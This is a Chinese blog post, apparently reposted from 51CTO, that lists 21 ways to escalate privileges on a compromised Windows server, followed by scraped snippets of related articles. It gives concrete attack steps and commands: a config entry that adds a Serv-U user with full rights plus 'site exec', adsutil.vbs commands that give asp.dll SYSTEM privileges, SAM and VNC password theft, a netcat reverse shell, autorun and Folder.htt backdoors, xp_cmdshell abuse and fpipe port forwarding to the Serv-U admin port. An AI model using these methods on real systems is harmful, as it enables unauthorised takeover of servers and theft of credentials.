黑客攻防专题八:21种RING的提权方法
以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!
1.radmin连接法
条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。
2.pcanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去
3.SAM破解
C:\WINNT\system32\config\ 下他的SAM 破解之
4.SU密码夺取
C:\Documents and Settings\All Users\「开始」菜单\程序\
引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1] Password= HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP Access1=d:\|RWAMELCDP Access1=f:\|RWAMELCDP SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
5.c:\winnt\system32\inetsrv\data\
引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
6.SU溢出提权
这个网上教程N多 不详细讲解了
7.运行Csript
引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
8.脚本提权
c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs
9.VNC
这个是小花的文章 HOHO
默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password
我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:\>vncx4 -W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权
给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了
11.社会工程学之GUEST提权
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮箱号 手机号 尽量看看 HOHO
12.IPC空连接
如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令
13.替换服务
这个不用说了吧?个人感觉相当复杂
14.autorun .inf
autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信他不运行
15.desktop.ini与Folder.htt
引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门
16.su覆盖提权
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了
17.SU转发端口
43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令: Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为$ak#.1k;#1@$ak#.1k'>0@p">#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了
18.SQL帐户密码泄露
如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。
引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。format选择xp_cmdshell“%s”即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了
19.asp.dll
引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去
了,注意,用法中的get和set,一个是查看一个是设置。还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这个目录下。
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东。
20.Magic Winmail
前提是你要有个webshell 引用:[url]http://www.eviloctal.com/forum/read.php[/url]?tid=3587这里去看吧
21.DBO……
其实 提升权限的方式很多的 就看大家怎么利用了 HOHO 加油吧 将服务器控制到底
本文转自starger51CTO博客,原文链接:http://blog.51cto.com/starger/17253 ,如需转载请自行联系原作者
黑客攻防专题八:21种RING的提权方法相关推荐
- sql1433端口msf、hydra弱口令爆破,获得了sql-server的权限,通过几种方式能够提权
如果得到了1433端口,进行弱口令爆破 ,百度下1433端口,弱口令爆破的方式,kali 中msf hydra弱口令爆破 第一种:kali 中msf 查看sql-server默认端口1433 sq ...
- Python黑客攻防(八)密码破解攻击
前言 进行黑客攻击通常需要做大量重复性工作.如果黑客直接通过浏览器攻击Web网站,就要不断手动修改输入值,并反复点击.但如果可以在应用程序内部访问Web网站并接收结果值,那么只需要使用简单的几行代码就 ...
- 黑客攻防专题三:名词介绍
对与很多初学者而言,网络安全中的一些名词可能大家不是很熟悉,下面我们就首先给大家介绍点名词: 1.肉鸡: 不是吃的那种,是中了我们的木马,或者留了后门,可以被我们远程操控的机器,现在许多人把有WEBS ...
- Windows常见的几种提权方法
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-杰斯 提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是 ...
- 【攻防】Kubelet访问控制机制与提权方法研究
背景 近些年针对kubernetes的攻击呈现愈演愈烈之势,一旦攻击者在kubernetes集群中站稳脚跟就会尝试渗透集群涉及的所有容器,尤其是针对访问控制和隔离做的不够好的集群受到的损害也会越大.例 ...
- PendingIntent重定向:一种针对安卓系统和流行App的通用提权方法——BlackHat EU 2021议题详解 (下)
以用户隐私安全为中心,用责任兑付信任,OPPO成立子午互联网安全实验室(ZIWU Cyber Security Lab).实验室以"保护用户的安全与隐私,为品牌注入安全基因"为使命 ...
- 网络攻防|CVE-2021-42287、CVE-2021-42278域内提权
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x01 漏洞原理 Microsoft Windows Active Directory 域服务权限提升漏 ...
- vulnhub渗透系列之DC(一) :内含suid的三种提权方法
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习. 实验过程总结 1.这个题我觉得对刚入门的我来说,十分的困难 ...
- 让你快乐的21种方法
飞鸽传书:让你快乐的21种方法 很多人都说过,快乐只是自己内心想法控制的,而每个人都想快乐,生活的意义也在于此,没有人愿意在悲哀和消沉中度过.我们经常能够看到那些生活快乐的人们,他们总是很快乐,即便生 ...
最新文章
- Java学习总结:18
- 推荐十款非常优秀的 HTML5 在线设计工具
- Javascript实现导出word - jquery jquery.wordexport.js 实现导出word
- Dump程序运行中的状态,变量值,等到文件
- 图 子类 数据库_构造知识图的语义模型
- 商业创业融资计划书PPT模板
- linux网络lo是什么,Linux基礎必懂:eth0,eth1,eth2,lo是什么意思?
- c语言 大小写 islower,C 库函数 islower() 使用方法及示例
- 编译MTK系统源码时checking Env失败的解决方法
- imx6ul 驱动详解
- 关于flask入门教程-ajax+echarts实现矩形树图
- [iOS]判断ipa是否脱壳
- Autocad2017破解版下载|Autodesk Autocad 2017中文破解版下载 64位(附注册机/序列号)
- 改进YOLOv5 | Stand-Alone Self-Attention | 针对视觉任务的独立自注意力层 | 搭建纯注意力FPN+PAN结构
- 高一数学补习可以提高孩子的数学成绩吗?
- pip版本更新的问题
- PPT模板副业小项目,低成本,适合新手操作
- 人脸识别与神经风格转换
- 《TCP/IP详解 卷2》 笔记:TCP的输入函数:tcp_input
- B站入股服装品牌,投资变“周常”事件,背后是盘什么棋?